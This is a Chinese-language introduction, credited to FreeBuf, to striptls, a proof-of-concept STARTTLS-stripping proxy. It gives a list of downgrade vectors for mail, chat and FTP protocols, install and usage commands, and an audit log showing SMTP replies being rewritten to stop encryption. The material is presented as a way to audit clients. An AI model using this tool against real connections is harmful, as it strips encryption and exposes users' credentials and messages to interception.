STARTTLS 是对纯文本通信协议的扩展。它提供一种方式将纯文本连接升级为加密连接(TLS或SSL),而不是另外使用一个端口作加密通信。
striptls是一款端口剥离攻击的POC实现
SMTP
SMTP.StripFromCapabilities - server response capability patchSMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response codeSMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)SMTP.StripWithTemporaryErrorSMTP.StripWithErrorSMTP.ProtocolDowngradeStripExtendedModeSMTP.InjectCommandPOP3
POP3.StripFromCapabilitiesPOP3.StripWithErrorPOP3.UntrustedInterceptIMAP
IMAP.StripFromCapabilitiesIMAP.StripWithErrorIMAP.UntrustedInterceptIMAP.ProtocolDowngradeToV2FTP
FTP.StripFromCapabilitiesFTP.StripWithErrorFTP.UntrustedInterceptNNTP
NNTP.StripFromCapabilitiesNNTP.StripWithErrorNNTP.UntrustedInterceptXMPP
XMPP.StripFromCapabilitiesXMPP.StripInboundTLSXMPP.UntrustedInterceptACAP (untested)ACAP.StripFromCapabilitiesACAP.StripWithErrorACAP.UntrustedInterceptIRC
IRC.StripFromCapabilitiesIRC.StripWithErrorIRC.UntrustedInterceptIRC.StripWithNotRegisteredIRC.StripCAPWithNotregisteredIRC.StripWithSilentDrop结果:
- [*] client: 127.0.0.1- [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>- [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>- [ ] <class striptls.StripFromCapabilities at 0xffd316bc>- [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>- [*] client: 192.168.139.1- [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>- [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>- [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>实例:#> python -m striptls --help # from pip/setup.py#> python striptls --help # from source / root folderUsage: striptls [options] example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25Options: -h, --help show this help message and exit -v, --verbose make lots of noise [default] -l LISTEN, --listen=LISTENlisten ip:port [default: 0.0.0.0:<remote_port>] -r REMOTE, --remote=REMOTE remote target ip:port to forward sessions to -k KEY, --key=KEY SSL Certificate and Private key file to use, PEMformat assumed [default: server.pem] -x VECTORS, --vectors=VECTORS Comma separated list of vectors. Use 'ALL' (default) to select all vectors. Available vectors: FTP.StripFromCapabilities, FTP.StripWithError, FTP.UntrustedIntercept, IMAP.StripFromCapabilities, IMAP.StripWithError, IMAP.UntrustedIntercept, NNTP.StripFromCapabilities, NNTP.StripWithError, NNTP.UntrustedIntercept, POP3.StripFromCapabilities, POP3.StripWithError, POP3.UntrustedIntercept, SMTP.ProtocolDowngradeStripExtendedMode, SMTP.StripFromCapabilities, SMTP.StripWithError, SMTP.StripWithInvalidResponseCode, SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept, XMPP.StripFromCapabilities, XMPP.StripInboundTLS, XMPP.UntrustedIntercept [default: ALL]安装:1.从pip安装
#> pip install striptls2.从源安装
#> setup.py install示例: inbound outbound[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target] smtp-client striptls remote/target本地 smtp-client -> localhost:8825 (代理)-> mail.gmx.net:25
审计模式:在特定的情况下遍历所有协议并且跟踪违反starttls协议的客户端。你可以选择按Ctrl+C来中止审核并打印结果。
#>pythonstriptls--listenlocalhost:8825--remote=mail.gmx.net:252016-02-0222:11:56,275-INFO -<Proxy0xffcf6d0cLlisten=('localhost',8825)target=('mail.gmx.net',25)>ready.2016-02-0222:11:56,275-DEBUG -*addedtest(port:21 ,proto: FTP):<classstriptls.StripFromCapabilitiesat0xffd4632c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:21 ,proto: FTP):<classstriptls.StripWithErrorat0xffd4635c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:21 ,proto: FTP):<classstriptls.UntrustedInterceptat0xffd4638c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:143 ,proto: IMAP):<classstriptls.StripFromCapabilitiesat0xffd4626c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:143 ,proto: IMAP):<classstriptls.StripWithErrorat0xffd4629c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:143 ,proto: IMAP):<classstriptls.UntrustedInterceptat0xffd462cc>2016-02-0222:11:56,275-DEBUG -*addedtest(port:119 ,proto: NNTP):<classstriptls.StripFromCapabilitiesat0xffd463ec>2016-02-0222:11:56,275-DEBUG -*addedtest(port:119 ,proto: NNTP):<classstriptls.StripWithErrorat0xffd4641c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:119 ,proto: NNTP):<classstriptls.UntrustedInterceptat0xffd4644c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:110 ,proto: POP3):<classstriptls.StripWithErrorat0xffd461dc>2016-02-0222:11:56,275-DEBUG -*addedtest(port:110 ,proto: POP3):<classstriptls.UntrustedInterceptat0xffd4620c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:25 ,proto: SMTP):<classstriptls.StripFromCapabilitiesat0xffd316bc>2016-02-0222:11:56,275-DEBUG -*addedtest(port:25 ,proto: SMTP):<classstriptls.StripWithErrorat0xffd4614c>2016-02-0222:11:56,276-DEBUG -*addedtest(port:25 ,proto: SMTP):<classstriptls.StripWithInvalidResponseCodeat0xffd3138c>2016-02-0222:11:56,276-DEBUG -*addedtest(port:25 ,proto: SMTP):<classstriptls.StripWithTemporaryErrorat0xffd4611c>2016-02-0222:11:56,276-DEBUG -*addedtest(port:25 ,proto: SMTP):<classstriptls.UntrustedInterceptat0xffd4617c>2016-02-0222:11:56,276-DEBUG -*addedtest(port:5222,proto: XMPP):<classstriptls.StripFromCapabilitiesat0xffd464ac>2016-02-0222:11:56,276-INFO -<RewriteDispatchervectors={5222:set([<classstriptls.StripFromCapabilitiesat0xffd464ac>]),110:set([<classstriptls.UntrustedInterceptat0xffd4620c>,<classstriptls.StripWithErrorat0xffd461dc>]),143:set([<classstriptls.StripWithErrorat0xffd4629c>,<classstriptls.UntrustedInterceptat0xffd462cc>,<classstriptls.StripFromCapabilitiesat0xffd4626c>]),21:set([<classstriptls.UntrustedInterceptat0xffd4638c>,<classstriptls.StripFromCapabilitiesat0xffd4632c>,<classstriptls.StripWithErrorat0xffd4635c>]),119:set([<classstriptls.StripWithErrorat0xffd4641c>,<classstriptls.UntrustedInterceptat0xffd4644c>,<classstriptls.StripFromCapabilitiesat0xffd463ec>]),25:set([<classstriptls.StripWithInvalidResponseCodeat0xffd3138c>,<classstriptls.StripWithTemporaryErrorat0xffd4611c>,<classstriptls.StripFromCapabilitiesat0xffd316bc>,<classstriptls.StripWithErrorat0xffd4614c>,<classstriptls.UntrustedInterceptat0xffd4617c>])}>2016-02-0222:12:08,477-DEBUG -<ProtocolDetect0xffcf6eccLprotocol_id=PROTO_SMTPlen_history=0>-protocoldetected(targetport)2016-02-0222:12:08,530-INFO -<Session0xffcf6e4cL>client('127.0.0.1',28902)hasconnected2016-02-0222:12:08,530-INFO -<Session0xffcf6e4cL>connectingtotarget('mail.gmx.net',25)2016-02-0222:12:08,805-DEBUG -<Session0xffcf6e4cL>[client]<=[server] '220gmx.com(mrgmx001)NemesisESMTPServiceready\r\n'2016-02-0222:12:08,805-DEBUG -<RewriteDispatcher -changedmangle:striptls.StripWithInvalidResponseCodenew:True>2016-02-0222:12:09,759-DEBUG -<Session0xffcf6e4cL>[client]=>[server] 'ehlo[192.168.139.1]\r\n'2016-02-0222:12:09,850-DEBUG -<Session0xffcf6e4cL>[client]<=[server] '250-gmx.comHello[192.168.139.1][109.126.64.2]\r\n250-SIZE31457280\r\n250-AUTHLOGINPLAIN\r\n250STARTTLS\r\n'2016-02-0222:12:09,851-DEBUG -<Session0xffcf6e4cL>[client]<=[server][mangled]'250-gmx.comHello[192.168.139.1][109.126.64.2]\r\n250-SIZE31457280\r\n250-AUTHLOGINPLAIN\r\n250-STARTTLS\r\n250STARTTLS\r\n'2016-02-0222:12:09,867-DEBUG -<Session0xffcf6e4cL>[client]=>[server] 'STARTTLS\r\n'2016-02-0222:12:09,867-DEBUG -<Session0xffcf6e4cL>[client]<=[server][mangled]'200STRIPTLS\r\n'2016-02-0222:12:09,867-DEBUG -<Session0xffcf6e4cL>[client]=>[server][mangled]None2016-02-0222:12:09,883-DEBUG -<Session0xffcf6e4cL>[client]=>[server] 'mailFROM:<a@b.com>size=10\r\n'2016-02-0222:12:09,983-DEBUG -<Session0xffcf6e4cL>[client]<=[server] '530Authenticationrequired\r\n'2016-02-0222:12:09,992-DEBUG -<Session0xffcf6e4cL>[client]=>[server] 'rset\r\n'2016-02-0222:12:10,100-DEBUG -<Session0xffcf6e4cL>[client]<=[server] '250OK\r\n'2016-02-0222:12:10,116-WARNING -<Session0xffcf6e4cL>terminated.2016-02-0222:12:13,056-DEBUG -<ProtocolDetect0xffd0920cLprotocol_id=PROTO_SMTPlen_history=0>-protocoldetected(targetport)2016-02-0222:12:13,056-INFO -<Session0xffd0918cL>client('127.0.0.1',28905)hasconnected2016-02-0222:12:13,057-INFO -<Session0xffd0918cL>connectingtotarget('mail.gmx.net',25)2016-02-0222:12:13,241-DEBUG -<Session0xffd0918cL>[client]<=[server] '220gmx.com(mrgmx003)NemesisESMTPServiceready\r\n'2016-02-0222:12:13,241-DEBUG -<RewriteDispatcher -changedmangle:striptls.StripWithTemporaryErrornew:True>2016-02-0222:12:14,197-DEBUG -<Session0xffd0918cL>[client]=>[server] 'ehlo[192.168.139.1]\r\n'2016-02-0222:12:14,289-DEBUG -<Session0xffd0918cL>[client]<=[server] '250-gmx.comHello[192.168.139.1][109.126.64.2]\r\n250-SIZE31457280\r\n250-AUTHLOGINPLAIN\r\n250STARTTLS\r\n'2016-02-0222:12:14,304-DEBUG -<Session0xffd0918cL>[client]=>[server] 'STARTTLS\r\n'2016-02-0222:12:14,305-DEBUG -<Session0xffd0918cL>[client]<=[server][mangled]'454TLSnotavailableduetotemporaryreason\r\n'2016-02-0222:12:14,305-DEBUG -<Session0xffd0918cL>[client]=>[server][mangled]None2016-02-0222:12:14,320-DEBUG -<Session0xffd0918cL>[client]=>[server] 'mailFROM:<a@b.com>size=10\r\n'2016-02-0222:12:14,411-DEBUG -<Session0xffd0918cL>[client]<=[server] '530Authenticationrequired\r\n'2016-02-0222:12:14,415-DEBUG -<Session0xffd0918cL>[client]=>[server] 'rset\r\n'2016-02-0222:12:14,520-DEBUG -<Session0xffd0918cL>[client]<=[server] '250OK\r\n'2016-02-0222:12:14,535-WARNING -<Session0xffd0918cL>terminated.2016-02-0222:12:16,649-DEBUG -<ProtocolDetect0xffd092ecLprotocol_id=PROTO_SMTPlen_history=0>-protocoldetected(targetport)2016-02-0222:12:16,650-INFO -<Session0xffd0926cL>client('127.0.0.1',28908)hasconnected2016-02-0222:12:16,650-INFO -<Session0xffd0926cL>connectingtotarget('mail.gmx.net',25)2016-02-0222:12:16,820-DEBUG -<Session0xffd0926cL>[client]<=[server] '220gmx.com(mrgmx003)NemesisESMTPServiceready\r\n'2016-02-0222:12:16,820-DEBUG -<RewriteDispatcher -changedmangle:striptls.StripFromCapabilitiesnew:True>2016-02-0222:12:17,760-DEBUG -<Session0xffd0926cL>[client]=>[server] 'ehlo[192.168.139.1]\r\n'2016-02-0222:12:17,849-DEBUG -<Session0xffd0926cL>[client]<=[server] '250-gmx.comHello[192.168.139.1][109.126.64.2]\r\n250-SIZE31457280\r\n250-AUTHLOGINPLAIN\r\n250STARTTLS\r\n'2016-02-0222:12:17,849-DEBUG -<Session0xffd0926cL>[client]<=[server][mangled]'250-gmx.comHello[192.168.139.1][109.126.64.2]\r\n250-SIZE31457280\r\n250AUTHLOGINPLAIN\r\n'2016-02-0222:12:17,871-WARNING -<Session0xffd0926cL>terminated.2016-02-0222:12:20,071-DEBUG -<ProtocolDetect0xffd093ccLprotocol_id=PROTO_SMTPlen_history=0>-protocoldetected(targetport)2016-02-0222:12:20,072-INFO -<Session0xffd0934cL>client('127.0.0.1',28911)hasconnected2016-02-0222:12:20,072-INFO -<Session0xffd0934cL>connectingtotarget('mail.gmx.net',25)2016-02-0222:12:20,239-DEBUG -<Session0xffd0934cL>[client]<=[server] '220gmx.com(mrgmx002)NemesisESMTPServiceready\r\n'2016-02-0222:12:20,240-DEBUG -<RewriteDispatcher -changedmangle:striptls.StripWithErrornew:True>2016-02-0222:12:21,181-DEBUG -<Session0xffd0934cL>[client]=>[server] 'ehlo[192.168.139.1]\r\n'2016-02-0222:12:21,269-DEBUG -<Session0xffd0934cL>[client]<=[server] '250-gmx.comHello[192.168.139.1][109.126.64.2]\r\n250-SIZE31457280\r\n250-AUTHLOGINPLAIN\r\n250STARTTLS\r\n'2016-02-0222:12:21,280-DEBUG -<Session0xffd0934cL>[client]=>[server] 'STARTTLS\r\n'2016-02-0222:12:21,281-DEBUG -<Session0xffd0934cL>[client]<=[server][mangled]'501Syntaxerror\r\n'2016-02-0222:12:21,281-DEBUG -<Session0xffd0934cL>[client]=>[server][mangled]None2016-02-0222:12:21,289-DEBUG -<Session0xffd0934cL>[client]=>[server] 'mailFROM:<a@b.com>size=10\r\n'2016-02-0222:12:21,381-DEBUG -<Session0xffd0934cL>[client]<=[server] '530Authenticationrequired\r\n'2016-02-0222:12:21,386-DEBUG -<Session0xffd0934cL>[client]=>[server] 'rset\r\n'2016-02-0222:12:21,469-DEBUG -<Session0xffd0934cL>[client]<=[server] '250OK\r\n'2016-02-0222:12:21,485-WARNING -<Session0xffd0934cL>terminated.2016-02-0222:12:23,665-WARNING -CtrlC-Stoppingserver2016-02-0222:12:23,665-INFO - --auditresults--2016-02-0222:12:23,666-INFO -[*]client:127.0.0.12016-02-0222:12:23,666-INFO - [Vulnerable!]<classstriptls.StripWithInvalidResponseCodeat0xffd3138c>2016-02-0222:12:23,666-INFO - [Vulnerable!]<classstriptls.StripWithTemporaryErrorat0xffd4611c>2016-02-0222:12:23,666-INFO - [ ]<classstriptls.StripFromCapabilitiesat0xffd316bc>2016-02-0222:12:23,666-INFO - [Vulnerable!]<classstriptls.StripWithErrorat0xffd4614c>除了审计模式外还有从服务端剥离starttls、无效化starttls响应、不可行的ssl链接(对于客户端则是不在检验服务端的证书是否可信)以及XMPP的追踪审计的功能。
介绍内容来自FreeBuf黑客与极客(FreeBuf.COM)
评论